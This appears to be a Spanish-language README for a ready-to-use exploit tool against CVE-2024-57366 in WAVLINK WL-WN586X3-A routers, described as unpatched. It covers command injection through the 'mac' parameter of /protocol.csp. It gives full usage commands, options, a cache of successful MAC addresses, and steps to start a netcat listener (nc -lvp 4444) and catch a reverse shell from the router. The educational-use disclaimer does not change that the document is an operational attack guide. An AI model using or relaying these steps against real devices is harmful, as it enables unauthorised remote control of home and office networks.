
Exploit productizado para CVE-2024-57366 en routers WAVLINK WL-WN586X3-A (¡SIN PARCHEAR A LA FECHA DE ESTA VERSIÓN!)
Un exploit robusto para CVE-2024-57366 que permite la ejecución remota de código en routers vulnerables mediante la omisión de validación de direcciones MAC e inyección de comandos.
Este es un exploit posterior a la autorización que requiere que la función "Remote Control" del router esté activada, así como la contraseña administrativa. El nombre de usuario administrativo está codificado como "admin".
sudo (requerido para la gestión de interfaces de red)pip3 install requests
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Script will ask: "Use cached MAC for quick exploit? (y/n):" - say "y"
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
python3 exploit.py --list-cached
--target - Dirección IP del router objetivo (por defecto: 127.0.0.1)--port - Puerto del router objetivo (por defecto: 80)--local-ip - Tu dirección IP local para la conexión de reverse shell--local-port - Puerto local para la conexión de reverse shell (por defecto: 4444)--password - Contraseña de administrador del router--ssid - Nombre de la red WiFi (por defecto: WAVLINK-Mesh_DC4B)--force-full - Forzar el exploit completo, omitir la comprobación de MAC en caché--list-cached - Listar las direcciones MAC en caché y salirCVE-2024-57366 explota una omisión en la validación de direcciones MAC en el firmware del router. La vulnerabilidad permite la inyección de comandos a través del parámetro mac en el endpoint /protocol.csp.
eth0 para preservar el contexto de red originalindex=1, token en la ruta URL)El exploit almacena automáticamente en caché las direcciones MAC exitosas en successful_macs.txt:
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here
32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
Adición manual de MAC: Edita successful_macs.txt y añade líneas como:
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
# Start netcat listener
nc -lvp 4444
# Run exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# When prompted to save MAC address, say "y"
# Start netcat listener
nc -lvp 4444
# Run exploit (will use cached MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Say "y" when asked about using cached MAC
"No se encontraron adaptadores inalámbricos"
sudo"La validación de la dirección MAC falló"
"La solicitud agotó el tiempo de espera"
"La reverse shell no conecta"
--local-ip sea correcta (usa ip addr show eth0)CVE-2024-57366/
├── exploit.py # Main exploit script
├── successful_macs.txt # MAC address cache (auto-generated)
└── README.md # This file
Esta herramienta es solo para fines educativos y de pruebas autorizadas. Úsala únicamente en sistemas que poseas o para los que tengas permiso explícito de prueba. Los autores no son responsables del mal uso de esta herramienta.
/protocol.cspEste proyecto se proporciona tal cual con fines educativos. Úsalo de forma responsable y de acuerdo con las leyes y regulaciones aplicables.